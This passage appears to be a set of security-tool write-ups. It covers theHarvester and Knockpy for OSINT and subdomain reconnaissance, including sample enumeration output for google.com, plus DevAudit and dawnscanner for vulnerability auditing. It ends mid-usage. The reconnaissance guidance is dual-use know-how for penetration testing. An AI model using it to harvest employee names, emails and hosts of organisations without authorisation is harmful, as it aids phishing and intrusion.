theHarvester v3.0.3 - E-mails, Subdomains And Names Harvester (OSINT)

theHarvester is a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/banners, and employee names from different public sources (search engines, PGP key servers).
It is a really simple tool, but very effective for the early stages of a penetration test, or just to find out how visible your company is on the Internet.

The sources are:

Passive:
  • threatcrowd: Open source threat intelligence - https://www.threatcrowd.org/
  • crtsh: Comodo Certificate search - www.crt.sh
  • google: google search engine - www.google.com (With optional google dorking)
  • googleCSE: google custom search engine
  • google-profiles: google search engine, specific search for Google profiles
  • bing: microsoft search engine - www.bing.com
  • bingapi: microsoft search engine, through the API (you need to add your Key in the discovery/bingsearch.py file)
  • dogpile: Dogpile search engine - www.dogpile.com
  • pgp: pgp key server - mit.edu
  • linkedin: google search engine, specific search for Linkedin users
  • vhost: Bing virtual hosts search
  • twitter: twitter accounts related to a specific domain (uses google search)
  • googleplus: users that work in the target company (uses google search)
  • yahoo: Yahoo search engine
  • baidu: Baidu search engine
  • shodan: Shodan Computer search engine, will search for ports and banners of the discovered hosts (http://www.shodanhq.com/)
  • hunter: Hunter search engine (you need to add your Key in the discovery/huntersearch.py file)
  • google-certificates: Google Certificate Transparency report

Active:
  • DNS brute force: this plugin will run a dictionary brute force enumeration
  • DNS reverse lookup: reverse lookup of discovered IPs in order to find hostnames
  • DNS TLD expansion: TLD dictionary brute force enumeration

Modules that need API keys to work:
  • googleCSE: You need to create a Google Custom Search Engine (CSE), and add your Google API key and CSE ID in the plugin (discovery/googleCSE.py)
  • shodan: You need to provide your API key in discovery/shodansearch.py (one provided at the moment)
  • hunter: You need to provide your API key in discovery/huntersearch.py (none is provided at the moment)
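
As a quick illustration, here is a minimal sketch of a typical run (example.com is a placeholder target), combining a domain, a data source, and a result limit via the standard -d, -b and -l flags:

python theHarvester.py -d example.com -b google -l 500

Other sources can be swapped in via -b (e.g. -b pgp or -b bing) to widen coverage.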

Changelog in 3.0.0:
  • Subdomain takeover checks
  • Port scanning (basic)
  • Improved DNS dictionary
  • Shodan DB search fixed
  • Result storage in SQLite

Comments? Bugs? Requests?
cmartorella@edge-security.com



    Knock v.4.1.1 - Subdomain Scan


    Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled. Knockpy now supports queries to VirusTotal subdomains; you can set the API_KEY within the config.json file.

    Very simply
    $ knockpy domain.com
    Export full report in JSON
    If you want to save the full log, like this one, just type:
    $ knockpy domain.com --json

    Install
    Prerequisites
    • Python 2.7.6
    Dependencies
    • Dnspython
    $ sudo apt-get install python-dnspython
    Installing
    $ git clone https://github.com/guelfoweb/knock.git

    $ cd knock

    $ nano knockpy/config.json <- set your virustotal API_KEY

    $ sudo python setup.py install
    Note that it's recommended to use Google DNS: 8.8.8.8 and 8.8.4.4
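
    For example, one common way to switch the system resolver to Google DNS on Linux (a sketch assuming a static /etc/resolv.conf that is not managed by another service):
    $ echo -e "nameserver 8.8.8.8\nnameserver 8.8.4.4" | sudo tee /etc/resolv.conf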


    Knockpy arguments
    $ knockpy -h
    usage: knockpy [-h] [-v] [-w WORDLIST] [-r] [-c] [-j] domain

    ___________________________________________

    knock subdomain scan
    knockpy v.4.1
    Author: Gianni 'guelfoweb' Amato
    Github: https://github.com/guelfoweb/knock
    ___________________________________________

    positional arguments:
    domain target to scan, like domain.com

    optional arguments:
    -h, --help show this help message and exit
    -v, --version show program's version number and exit
    -w WORDLIST specific path to wordlist file
    -r, --resolve resolve ip or domain name
    -c, --csv save output in csv
    -f, --csvfields add fields name to the first row of csv output file
    -j, --json export full report in JSON

    example:
    knockpy domain.com
    knockpy domain.com -w wordlist.txt
    knockpy -r domain.com or IP
    knockpy -c domain.com
    knockpy -j domain.com
    For virustotal subdomains support you can set your API_KEY in the config.json file.


    Example
    Subdomain scan with internal wordlist
    $ knockpy domain.com
    Subdomain scan with external wordlist
    $ knockpy domain.com -w wordlist.txt
    Resolve domain name and get response headers
    $ knockpy -r domain.com [or IP]
    + checking for virustotal subdomains: YES
    [
        "partnerissuetracker.corp.google.com",
        "issuetracker.google.com",
        "r5---sn-ogueln7k.c.pack.google.com",
        "cse.google.com",

        .......too long.......

        "612.talkgadget.google.com",
        "765.talkgadget.google.com",
        "973.talkgadget.google.com"
    ]
    + checking for wildcard: NO
    + checking for zonetransfer: NO
    + resolving target: YES
    {
        "zonetransfer": {
            "enabled": false,
            "list": []
        },
        "target": "google.com",
        "hostname": "google.com",
        "virustotal": [
            "partnerissuetracker.corp.google.com",
            "issuetracker.google.com",
            "r5---sn-ogueln7k.c.pack.google.com",
            "cse.google.com",
            "mt0.google.com",
            "earth.google.com",
            "clients1.google.com",
            "pki.google.com",
            "www.sites.google.com",
            "appengine.google.com",
            "fcmatch.google.com",
            "dl.google.com",
            "translate.google.com",
            "feedproxy.google.com",
            "hangouts.google.com",
            "news.google.com",

            .......too long.......

            "100.talkgadget.google.com",
            "services.google.com",
            "301.talkgadget.google.com",
            "857.talkgadget.google.com",
            "600.talkgadget.google.com",
            "992.talkgadget.google.com",
            "93.talkgadget.google.com",
            "storage.cloud.google.com",
            "863.talkgadget.google.com",
            "maps.google.com",
            "661.talkgadget.google.com",
            "325.talkgadget.google.com",
            "sites.google.com",
            "feedburner.google.com",
            "support.google.com",
            "code.google.com",
            "562.talkgadget.google.com",
            "190.talkgadget.google.com",
            "58.talkgadget.google.com",
            "612.talkgadget.google.com",
            "765.talkgadget.google.com",
            "973.talkgadget.google.com"
        ],
        "alias": [],
        "wildcard": {
            "detected": {},
            "test_target": "eqskochdzapjbt.google.com",
            "enabled": false,
            "http_response": {}
        },
        "ipaddress": [
            "216.58.205.142"
        ],
        "response_time": "0.0351989269257",
        "http_response": {
            "status": {
                "reason": "Found",
                "code": 302
            },
            "http_headers": {
                "content-length": "256",
                "location": "http://www.google.it/?gfe_rd=cr&ei=60WIWdmnDILCXoKbgfgK",
                "cache-control": "private",
                "date": "Mon, 07 Aug 2017 10:50:19 GMT",
                "referrer-policy": "no-referrer",
                "content-type": "text/html; charset=UTF-8"
            }
        }
    }
    Save scan output in CSV
    $ knockpy -c domain.com
    Export full report in JSON
    $ knockpy -j domain.com

    Talk about
    Ethical Hacking and Penetration Testing Guide, a book by Rafay Baloch.
    Knockpy comes pre-installed on several security distributions for penetration testing.

    Other
    This tool is currently maintained by Gianni 'guelfoweb' Amato, who can be contacted at guelfoweb@gmail.com or on Twitter @guelfoweb. Suggestions and criticism are welcome.


    DevAudit - Open-source, Cross-Platform, Multi-Purpose Security Auditing Tool


    DevAudit is an open-source, cross-platform, multi-purpose security auditing tool targeted at developers and teams adopting DevOps and DevSecOps that detects security vulnerabilities at multiple levels of the solution stack. DevAudit provides a wide array of auditing capabilities that automate security practices and implementation of security auditing in the software development life-cycle. DevAudit can scan your operating system and application package dependencies, application and application server configurations, and application code, for potential vulnerabilities based on data aggregated by providers like OSS Index and Vulners from a wide array of sources and data feeds such as the National Vulnerability Database (NVD) CVE data feed, the Debian Security Advisories data feed, Drupal Security Advisories, and many others.

    DevAudit helps developers address at least 4 of the OWASP Top 10 risks to web application development, as well as risks classified by MITRE in the CWE dictionary, such as CWE-2 Environment and CWE-200 Information Disclosure.


    As development progresses and its capabilities mature, DevAudit will be able to address the other risks on the OWASP Top 10 and CWE lists, like Injection and XSS. With the focus on web, cloud, and distributed multi-user applications, software development today is increasingly a complex affair, with security issues and potential vulnerabilities arising at all levels of the stack that developers rely on to deliver applications. The goal of DevAudit is to provide a platform for automating the implementation of development security reviews and best practices at all levels of the solution stack, from library package dependencies to application and server configuration to source code.

    Features
    • Cross-platform with a Docker image also available. DevAudit runs on Windows and Linux with *BSD and Mac and ARM Linux support planned. Only an up-to-date version of .NET or Mono is required to run DevAudit. A DevAudit Docker image can also be pulled from Docker Hub and run without the need to install Mono.
    • CLI interface. DevAudit has a CLI interface with an option for non-interactive output and can be easily integrated into CI build pipelines or as post-build command-line tasks in developer IDEs. Work on integration of the core audit library into IDE GUIs has already begun with the Audit.Net Visual Studio extension.
    • Continuously updated vulnerabilities data. DevAudit uses backend data providers like OSS Index and Vulners which provide continuously updated vulnerabilities data compiled from a wide range of security data feeds and sources such as the NVD CVE feeds, Drupal Security Advisories, and so on. Support for additional vulnerability and package data providers like vFeed and Libraries.io will be added.
    • Audit operating system and development package dependencies. DevAudit audits Windows applications and packages installed via Windows MSI, Chocolatey, and OneGet, as well as Debian, Ubuntu, and CentOS Linux packages installed via Dpkg, RPM and YUM, for vulnerabilities reported for specific versions of the applications and packages. For development package dependencies and libraries DevAudit audits NuGet v2 dependencies for .NET, Yarn/NPM and Bower dependencies for nodejs, and Composer package dependencies for PHP. Support for other package managers for different languages is added regularly.
    • Audit application server configurations. DevAudit audits the server version and the server configuration for the OpenSSH sshd, Apache httpd, MySQL/MariaDB, PostgreSQL, and Nginx servers with many more coming. Configuration auditing is based on the Alpheus library and is done using full syntactic analysis of the server configuration files. Server configuration rules are stored in YAML text files and can be customized to the needs of developers. Support for many more servers and applications and types of analysis like database auditing is added regularly.
    • Audit application configurations. DevAudit audits Microsoft ASP.NET applications and detects vulnerabilities present in the application configuration. Application configuration rules are stored in YAML text files and can be customized to the needs of developers. Application configuration auditing for applications like Drupal and WordPress and DNN CMS is coming.
    • Audit application code by static analysis. DevAudit currently supports static analysis of .NET CIL bytecode. Analyzers reside in external script files and can be fully customized based on the needs of the developer. Support for C# source code analysis via Roslyn, PHP7 source code and many more languages and external static code analysis tools is coming.
    • Remote agentless auditing. DevAudit can connect to remote hosts via SSH with identical auditing features available in remote environments as in local environments. Only a valid SSH login is required to audit remote hosts and DevAudit running on Windows can connect to and audit Linux hosts over SSH. On Windows DevAudit can also remotely connect to and audit other Windows machines using WinRM.
    • Agentless Docker container auditing. DevAudit can audit running Docker containers from the Docker host with identical features available in container environments as in local environments.
    • GitHub repository auditing. DevAudit can connect directly to a project repository hosted on GitHub and perform package source and application configuration auditing.
    • PowerShell support. DevAudit can also be run inside the PowerShell system administration environment as cmdlets. Work on PowerShell support is paused at present but will resume in the near future with support for cross-platform PowerShell both on Windows and Linux.

    Requirements
    DevAudit is a .NET 4.6 application. To install locally on your machine you will need either the Microsoft .NET Framework 4.6 runtime on Windows, or Mono 4.4+ on Linux. .NET 4.6 should be already installed on most recent versions of Windows, if not then it is available as a Windows feature that can be turned on or installed from the Programs and Features control panel applet on consumer Windows, or from the Add Roles and Features option in Server Manager on server versions of Windows. For older versions of Windows, the .NET 4.6 installer from Microsoft can be found here.
    On Linux the minimum version of Mono supported is 4.4. Although DevAudit runs on Mono 4 (with one known issue) it's recommended that Mono 5 be installed. Mono 5 brings many improvements to the build and runtime components of Mono that benefit DevAudit.
    The existing Mono packages provided by your distro are probably not Mono 5 as yet, so you will have to install Mono packages manually to be able to use Mono 5. Installation instructions for the most recent packages provided by the Mono project for several major Linux distros are here. It is recommended you have the mono-devel package installed as this will reduce the chances of missing assemblies.
    Alternatively on Linux you can use the DevAudit Docker image if you do not wish to install Mono and already have Docker installed on your machine.

    Installation
    DevAudit can be installed by the following methods:
    • Building from source.
    • Using a binary release archive file downloaded from Github for Windows or Linux.
    • Using the release MSI installer downloaded from Github for Windows.
    • Using the Chocolatey package manager on Windows.
    • Pulling the ossindex/devaudit image from Docker Hub on Linux.

    Building from source on Linux
    1. Pre-requisites: Mono 4.4+ (Mono 5 recommended) and the mono-devel package which provides the compiler and other tools needed for building Mono apps. Your distro should have packages for at least Mono version 4.4 and above, otherwise manual installation instructions for the most recent packages provided by the Mono project for several major Linux distros are here
    2. Clone the DevAudit repository from https://github.com/OSSIndex/DevAudit.git
    3. Run the build.sh script in the root DevAudit directory. DevAudit should compile without any errors.
    4. Run ./devaudit --help and you should see the DevAudit version and help screen printed.
    Note that NuGet on Linux may occasionally exit with Error: NameResolutionFailure which seems to be a transient problem contacting the servers that contain the NuGet packages. You should just run ./build.sh again until the build completes normally.

    Building from source on Windows
    1. Pre-requisites: You must have a .NET build environment such as Visual Studio 2015.
    2. Clone the DevAudit repository from https://github.com/OSSIndex/DevAudit.git
    3. From a Visual Studio 2015 or .NET command prompt, run the build.cmd script in the root DevAudit directory. DevAudit should compile without any errors.
    4. Run ./devaudit --help and you should see the DevAudit version and help screen printed.

    Installing from the release archive files on Windows or Linux
    1. Pre-requisites: You must have Mono 4.4+ on Linux or .NET 4.6 on Windows.
    2. Download the latest release archive file for Windows or Linux from the project releases page. Unpack this file to a directory.
    3. From the directory where you unpacked the release archive run devaudit --help on Windows or ./devaudit --help on Linux. You should see the version and help screen printed.
    4. (Optional) Add the DevAudit installation directory to your PATH environment variable

    Installing using the MSI Installer on Windows
    The MSI installer for a release can be found on the Github releases page.
    1. Click on the releases link near the top of the page.
    2. Identify the release you would like to install.
    3. A "DevAudit.exe" link should be visible for each release that has a pre-built installer.
    4. Download the file and execute the installer. You will be guided through a simple installation.
    5. Open a new command prompt or PowerShell window in order to have DevAudit in path.
    6. Run DevAudit.

    Installing using Chocolatey on Windows
    DevAudit is also available on Chocolatey.
    1. Install Chocolatey.
    2. Open an admin console or PowerShell window.
    3. Type choco install devaudit
    4. Run DevAudit.

    Installing using Docker on Linux
    Pull the DevAudit image from Docker Hub: docker pull ossindex/devaudit. The image tagged ossindex/devaudit:latest (the default image that is downloaded) is built from the most recent release, while ossindex/devaudit:unstable is built on the master branch of the source code and contains the newest additions, albeit with less testing.

    Concepts

    Audit Target
    Represents a logical group of auditing functions. DevAudit currently supports the following audit targets:
    • Package Source. A package source manages application and library dependencies using a package manager. Package managers install, remove or update applications and library dependencies for an operating system like Debian Linux, or for a development language or framework like .NET or nodejs. Examples of package sources are dpkg, yum, Chocolatey, Composer, and Bower. DevAudit audits the names and versions of installed packages against vulnerabilities reported for specific versions of those packages.
    • Application. An application like Drupal or a custom application built using a framework like ASP.NET. DevAudit audits applications and application modules and plugins against vulnerabilities reported for specific versions of application binaries and modules and plugins. DevAudit can also audit application configurations for known vulnerabilities, and perform static analysis on application code looking for known weaknesses.
    • Application Server. Application servers provide continuously running services or daemons like a web or database server for other applications to use, or for users to access services like authentication. Examples of application servers are the OpenSSH sshd and Apache httpd servers. DevAudit can audit application server binaries, modules and plugins against vulnerabilities reported for specific versions as well as audit server configurations for known server configuration vulnerabilities and weaknesses.

    Audit Environment
    Represents a logical environment where audits against audit targets are executed. Audit environments abstract the I/O and command executions required for an audit and allow identical functions to be performed against audit targets at whatever physical or network location the target's files and executables are located. The following environments are currently supported:
    • Local. This is the default audit environment where audits are executed on the local machine.
    • SSH. Audits are executed on a remote host connected over SSH. It is not necessary to have DevAudit installed on the remote host.
    • WinRM. Audits are executed on a remote Windows host connected over WinRM. It is not necessary to have DevAudit installed on the remote host.
    • Docker. Audits are executed on a running Docker container. It is not necessary to have DevAudit installed on the container image.
    • GitHub. Audits are executed on a GitHub project repository's file-system directly. It is not necessary to checkout or download the project locally to perform the audit.

    Audit Options
    These are the different options that can be enabled for the audit. You can specify options that apply to the DevAudit program, for example to run in non-interactive mode, as well as options that apply to the target, e.g. if you set the AppDevMode option to true when auditing ASP.NET applications then certain audit rules will not be enabled.

    Basic Usage
    The CLI is the primary interface to the DevAudit program and is suitable both for interactive use and for non-interactive use in scheduled tasks, shell scripts, CI build pipelines and post-build tasks in developer IDEs. The basic DevAudit CLI syntax is:
    devaudit TARGET [ENVIRONMENT] | [OPTIONS]
    where TARGET specifies the audit target, ENVIRONMENT specifies the audit environment, and OPTIONS specifies the options for the audit target and environment. There are 2 ways to specify options: program options and general audit options that apply to more than one target can be specified directly on the command-line as parameters. Target-specific options can be specified with the -o option using the format -o OPTION1=VALUE1,OPTION2=VALUE2,... with commas delimiting each option key-value pair.
    If you are piping or redirecting the program output to a file then you should always use the -n --non-interactive option to disable any interactive user interface features and animations.
    When specifying file paths, an @ prefix before a path indicates to DevAudit that this path is relative to the root directory of the audit target, e.g. if you specify -r c:\myproject -b @bin\Debug\app2.exe then DevAudit considers the path to the binary file to be c:\myproject\bin\Debug\app2.exe.
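    Putting these pieces together, a hypothetical non-interactive ASP.NET audit using the @ path prefix and the -o option syntax described above might look like:
    devaudit aspnet -n -r c:\myproject -b @bin\Debug\app2.exe -o AppDevMode=enabled
    Here -n disables interactive output (suitable for CI pipelines) and the binary path resolves to c:\myproject\bin\Debug\app2.exe.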

    Audit Targets

    Package Sources
    • msi Do a package audit of the Windows Installer MSI package source on Windows machines.
    • choco Do a package audit of packages installed by the Choco package manager.
    • oneget Do a package audit of the system OneGet package source on Windows.
    • nuget Do a package audit of a NuGet v2 package source. You must specify the location of the NuGet packages.config file you wish to audit using the -f or --file option otherwise the current directory will be searched for this file.
    • bower Do a package audit of a Bower package source. You must specify the location of the Bower packages.json file you wish to audit using the -f or --file option otherwise the current directory will be searched for this file.
    • composer Do a package audit of a Composer package source. You must specify the location of the Composer composer.json file you wish to audit using the -f or --file option otherwise the current directory will be searched for this file.
    • dpkg Do a package audit of the system dpkg package source on Debian Linux and derivatives.
    • rpm Do a package audit of the system RPM package source on RedHat Linux and derivatives.
    • yum Do a package audit of the system Yum package source on RedHat Linux and derivatives.
    For every package source the following general audit options can be used:
    • -f --file Specify the location of the package manager configuration file if needed. The NuGet, Bower and Composer package sources require this option.
    • --list-packages Only list the packages in the package source scanned by DevAudit.
    • --list-artifacts Only list the artifacts found on OSS Index for packages scanned by DevAudit.
    Package sources tagged [Experimental] are only available in the master branch of the source code and may have limited back-end OSS Index support. However you can always list the packages scanned and artifacts available on OSS Index using the list-packages and list-artifacts options.
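    For example, a hypothetical NuGet audit that points DevAudit at a project's packages.config file and lists only the scanned packages could be invoked as:
    devaudit nuget -f c:\myproject\packages.config --list-packages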

    Applications
    • aspnet Do an application audit on a ASP.NET application. The relevant options are:
      • -r --root-directory Specify the root directory of the application. This is just the top-level application directory that contains files like Global.asax and Web.config.
      • -b --application-binary Specify the application binary. This is the .NET assembly that contains the application's .NET bytecode. This file is usually a .DLL and located in the bin sub-folder of the ASP.NET application root directory.
      • -c --configuration-file or -o AppConfig=configuration-file Specifies the ASP.NET application configuration file. This file is usually named Web.config and located in the application root directory. You can override the default @Web.config value with this option.
      • -o AppDevMode=enabled Specifies that application development mode should be enabled for the audit. This mode can be used when auditing an application that is under development. Certain configuration rules that are tagged as disabled for AppDevMode (e.g. running the application in ASP.NET debug mode) will not be enabled during the audit.
    • netfx Do an application audit on a .NET application. The relevant options are:
      • -r --root-directory Specify the root directory of the application. This is just the top-level application directory that contains files like App.config.
      • -b --application-binary Specify the application binary. This is the .NET assembly that contains the application's .NET bytecode. This file is usually a .DLL and located in the bin sub-folder of the application root directory.
      • -c --configuration-file or -o AppConfig=configuration-file Specifies the .NET application configuration file. This file is usually named App.config and located in the application root directory. You can override the default @App.config value with this option.
      • -o GendarmeRules=RuleLibrary Specifies that the Gendarme static analyzer should be enabled for the audit, using rules from the specified rules library. For example: devaudit netfx -r /home/allisterb/vbot-debian/vbot.core -b @bin/Debug/vbot.core.dll --skip-packages-audit -o GendarmeRules=Gendarme.Rules.Naming will run the Gendarme static analyzer on the vbot.core.dll assembly using rules from the Gendarme.Rules.Naming library. The complete list of rules libraries is (taken from the Gendarme wiki):
    • drupal7 Do an application audit on a Drupal 7 application.
      • -r --root-directory Specify the root directory of the application. This is just the top-level directory of your Drupal 7 install.
    • drupal8 Do an application audit on a Drupal 8 application.
      • -r --root-directory Specify the root directory of the application. This is just the top-level directory of your Drupal 8 install.
    All applications also support the following common options for auditing the application modules or plugins:
    • --list-packages Only list the application plugins or modules scanned by DevAudit.
    • --list-artifacts Only list the artifacts found on OSS Index for application plugins and modules scanned by DevAudit.
    • --skip-packages-audit Only do an application configuration or code analysis audit and skip the packages audit.
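    As a sketch with hypothetical paths, a Drupal 8 audit that skips the modules/packages audit and only performs the configuration and code analysis part would combine the options above like so:
    devaudit drupal8 -r /var/www/drupal8 --skip-packages-audit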

    Application Servers
    • sshd Do an application server audit on an OpenSSH sshd-compatible server.
    • httpd Do an application server audit on an Apache httpd-compatible server.
    • mysql Do an application server audit on a MySQL-compatible server (like MariaDB or Oracle MySQL.)
    • nginx Do an application server audit on a Nginx server.
    • pgsql Do an application server audit on a PostgreSQL server.
    This is an example command line for an application server audit: ./devaudit httpd -i httpd-2.2 -r /usr/local/apache2/ -c @conf/httpd.conf -b @bin/httpd which audits an Apache Httpd server running on a Docker container named httpd-2.2.
    The following are audit options common to all application servers:
    • -r --root-directory Specifies the root directory of the server. This is just the top-level of your server filesystem and defaults to / unless you want a different server root.
    • -c --configuration-file Specifies the server configuration file, e.g. in the above audit the Apache configuration file is located at /usr/local/apache2/conf/httpd.conf. If you don't specify the configuration file DevAudit will attempt to auto-detect the configuration file for the server selected.
    • -b --application-binary Specifies the server binary, e.g. in the above audit the Apache binary is located at /usr/local/apache2/bin/httpd. If you don't specify the binary path DevAudit will attempt to auto-detect the server binary for the server selected.
    Application servers also support the following common options for auditing the server modules or plugins:
    • --list-packages Only list the application plugins or modules scanned by DevAudit.
    • --list-artifacts Only list the artifacts found on OSS Index for application plugins and modules scanned by DevAudit.
    • --skip-packages-audit Only do a server configuration audit and skip the packages audit.

    Environments
    There are currently 5 audit environments supported: local, remote hosts over SSH, remote hosts over WinRM, Docker containers, and GitHub. The local environment is used by default when no other environment options are specified.

    SSH
    The SSH environment allows audits to be performed on any remote host accessible over SSH without requiring DevAudit to be installed on the remote host. SSH environments are cross-platform: you can connect to a Linux remote host from a Windows machine running DevAudit. An SSH environment is created by the following options: -s SERVER [--ssh-port PORT] -u USER [-k KEYFILE] [-p | --password-text PASSWORD]
    -s SERVER Specifies the remote host or IP to connect to via SSH.
    -u USER Specifies the user to login to the server with.
    --ssh-port PORT Specifies the port on the remote host to connect to. The default is 22.
    -k KEYFILE Specifies the OpenSSH compatible private key file to use to connect to the remote server. Currently only RSA or DSA keys in files in the PEM format are supported.
    -p Provide a prompt with local echo disabled for interactive entry of the server password or key file passphrase.
    --password-text PASSWORD Specify the user password or key file passphrase as plaintext on the command-line. Note that on Linux, when your password contains special characters, you should enclose the text in single-quotes like 'MyPa<ss' to avoid the shell interpreting the special characters.
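    For instance, a dpkg package audit of a hypothetical remote Debian host over SSH, authenticating with a PEM-format private key and prompting for its passphrase, could look like:
    devaudit dpkg -s 192.168.1.50 -u auditor -k /home/auditor/.ssh/audit_key.pem -p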

    WinRM
    The WinRM environment allows audits to be performed on any remote Windows hosts accessible over WinRM without requiring DevAudit to be installed on the remote host. WinRM environments are currently only available on Windows machines running DevAudit. A WinRM environment is created by the following options: -w IP -u USER [-p | --password-text PASSWORD]
    -w IP Specifies the remote IP to connect to via WinRM.
    -u USER Specifies the user to login to the server with.
    -p Provide a prompt with local echo disabled for interactive entry of the server password or key file passphrase.
    --password-text PASSWORD Specify the server password or key file passphrase as plaintext on the command-line.

    Docker
    This section discusses how to audit Docker images using DevAudit installed on the local machine. For running DevAudit as a containerized Docker app see the section below on Docker Usage.
    A Docker audit environment is specified by the following option: -i CONTAINER_NAME | -i CONTAINER_ID



    CONTAINER_(NAME|ID) Specifies the name or id of a running Docker container to connect to. The container must already be running, as DevAudit does not know how to start the container with the name or the state you require.

    GitHub
    The GitHub audit environment allows audits to be performed directly on a GitHub project repository. A GitHub environment is created by the -g option: -g "Owner=OWNER,Name=NAME,Branch=BRANCH"
    OWNER Specifies the owner of the project
    NAME Specifies the name of the project
    BRANCH Specifies the branch of the project to connect to
    You can use the -r, -c, and -f options as usual to specify the path to file-system files and directories required for the audit, e.g. the following command: devaudit aspnet -g "Owner=Dnnsoftware,Name=Dnn.Platform,Branch=Release/9.0.2" -r /Website -c @web.config will do an ASP.NET audit on the repository https://github.com/dnnsoftware/Dnn.Platform/ using the /Website source folder as the root directory and the web.config file as the ASP.NET configuration file. Note that filenames are case-sensitive in most environments.


    Program Options
    -n --non-interactive Run DevAudit in non-interactive mode with all interactive features and animations of the CLI disabled. This mode is necessary when running DevAudit in shell scripts, for instance, otherwise errors will occur when DevAudit attempts to use interactive console features.
    -d --debug Run DevAudit in debug mode. This will print a variety of informational and diagnostic messages. This mode is used for troubleshooting DevAudit errors and bugs.

    Docker Usage
    DevAudit also ships as a Docker containerized app which allows users on Linux to run DevAudit without the need to install Mono and build from source. To pull the DevAudit Docker image from Docker Hub:
    docker pull ossindex/devaudit[:label]
    The current images are about 131 MB compressed. By default the image labelled latest is pulled which is the most recent release of the program. An unstable image is also available which tracks the master branch of the source code. To run DevAudit as a containerized app:
    docker run -i -t ossindex/devaudit TARGET [ENVIRONMENT] | [OPTIONS]
    The -i and -t Docker options are necessary for running DevAudit interactively. If you don't specify these options then you must run DevAudit in non-interactive mode by using the DevAudit option -n.
    You must mount any directories on the Docker host machine that DevAudit needs to access on the DevAudit Docker container using the Docker -v option. If you mount your local root directory at a mount point named /hostroot on the Docker image then DevAudit can access files and directories on your local machine using the same local paths. For example:
    docker run -i -t -v /:/hostroot:ro ossindex/devaudit netfx -r /home/allisterb/vbot-debian/vbot.core
    will allow the DevAudit Docker container to audit the local directory /home/allisterb/vbot-debian/vbot.core. You must mount your local root in this way to audit other Docker containers from the DevAudit container e.g.
    docker run -i -t -v /:/hostroot:ro ossindex/devaudit mysql -i myapp1 -r / -c /etc/my.cnf --skip-packages-audit
    will run a MySQL audit on a Docker container named myapp1 from the ossindex/devaudit container.
    If you do not need to mount your entire root directory then you can mount just the directory needed for the audit. For example:
    docker run -i -t -v /home/allisterb/vbot-debian/vbot.core:/vbot:ro ossindex/devaudit netfx -r /vbot -b @bin/Debug/vbot.core.dll
    will mount read-only the /home/allisterb/vbot-debian/vbot.core directory as /vbot on the DevAudit container which allows DevAudit to access it as the audit root directory for a netfx application audit at /vbot.
    If you wish to use private key files on the local Docker host for an audit over SSH, you can mount your directory that contains the needed key file and then tell DevAudit to use that file path e.g.
    docker run -i -t -v /home/allisterb/.ssh:/ssh:ro ossindex/devaudit dpkg -s localhost -u allisterb -p -k /ssh/mykey.key
    will mount the directory containing key files at /ssh and allow the DevAudit container to use them.
    Note that it's currently not possible for the Docker container to audit operating system package sources like dpkg or rpm or application servers like OpenSSH sshd on the local Docker host without mounting your local root directory at /hostroot as described above. DevAudit must chroot into your local root directory from the Docker container when running executables like dpkg or server binaries like sshd and httpd. You must also mount your local root as described above to audit other Docker containers from the DevAudit container as DevAudit also needs to chroot into your local root to execute local Docker commands to communicate with your other containers.
    For running audits over SSH from the DevAudit container it is not necessary to mount the local root at /hostroot.

    Troubleshooting
    If you encounter a bug or other issue with DevAudit there are a couple of things you can enable to help us resolve it:
    • Use the -d option to enable debugging output. Diagnostic information will be emitted during the audit run.
    • On Linux use the DEVAUDIT_TRACE variable to enable tracing program execution. The value of this variable must be in the format for Mono tracing, e.g. you can set DEVAUDIT_TRACE=N:DevAudit.AuditLibrary to trace all the calls made to the audit library during an audit.

    Known Issues
    • On Windows you must use the -n --non-interactive program option when piping or redirecting program output to a file otherwise a crash will result. This behaviour may be changed in the future to make non-interactive mode the default.
    • There appears to be an issue using the Windows console app ConEmu and the Cygwin builds of the OpenSSH client when SSHing into remote Linux hosts to run Mono apps. If you run DevAudit this way you may notice strange sequences appearing sometimes at the end of console output. You may also have problems during keyboard interactive entry like entering passwords for SSH audits where the wrong password appears to be sent. If you are having problems entering passwords for SSH audits using ConEmu when working remotely, try holding the backspace key for a second or two to clear the input buffer before entering your password.


    Dawnscanner - Dawn Is A Static Analysis Security Scanner For Ruby Written Web Applications (Sinatra, Padrino And ROR Frameworks)


    dawnscanner is a source code scanner designed to review your ruby code for security issues.
    dawnscanner is able to scan plain ruby scripts (e.g. command line applications) but all its features are unleashed when dealing with web application source code. dawnscanner is able to scan major MVC (Model View Controller) frameworks out of the box: Sinatra, Padrino, and Ruby on Rails.

    Quick update from November, 2018
    As you can see, dawnscanner has been on hold for more than a year. Sorry for that. It's life. I was overwhelmed by tons of stuff and I dedicated my free time to Offensive Security certifications. Truth be told, I'm starting the OSCE journey really soon.
    The dawnscanner project will be updated soon with new security checks and kickstarted again.
    Paolo

    dawnscanner version 1.6.6 has 235 security checks loaded in its knowledge base. Most of them are CVE bulletins applying to gems or the ruby interpreter itself. There are also some checks coming from the Owasp Ruby on Rails cheatsheet.

    An overall introduction
    When you run dawnscanner on your code it parses your project Gemfile.lock looking for the gems used, and it tries to detect the ruby interpreter version you are using or declared in the ruby version management tool you like most (RVM, rbenv, ...).
    Then the tool tries to detect the MVC framework your web application uses and applies the security checks accordingly. There are checks designed to match rails applications and checks that are applicable to any ruby code.
    dawnscanner can also understand the code in your views and backtrack sinks to spot cross site scripting and sql injections introduced by the code you actually wrote. In the project roadmap this is the code most of the future development effort will be focused on.
    The dawnscanner security scan result is a list of vulnerabilities with some mitigation actions you want to follow in order to build a stronger web application.

    Installation
    You can install the latest dawnscanner version, fetching it from Rubygems, by typing:
    $ gem install dawnscanner 
    If you want to add dawn to your project Gemfile, you must add the following:
    group :development do
      gem 'dawnscanner', :require => false
    end
    And then upgrade your bundle
    $ bundle install
    You may want to build it from source, so you have to check it out from github first:
    $ git clone https://github.com/thesp0nge/dawnscanner.git
    $ cd dawnscanner
    $ bundle install
    $ rake install
    And the dawnscanner gem will be built in a pkg directory and then installed on your system. Please note that you have to manage dependencies on your own this way. It makes sense only if you want to hack the code or something like that.

    Usage
    You can start your code review with dawnscanner very easily. Simply tell the tool where the project root directory is.
    The underlying MVC framework is autodetected by dawnscanner using the target Gemfile.lock file. If autodetection fails for some reason, the tool will complain about it and you have to specify by hand whether it's a rails, sinatra or padrino web application.
    Basic usage is to specify some optional command line options to best fit your needs, and to specify the target directory where your code is stored.
    $ dawn [options] target
    In case of need, there is a quick command line option reference available by running dawn -h at your OS prompt.
    $ dawn -h
    Usage: dawn [options] target_directory

    Examples:
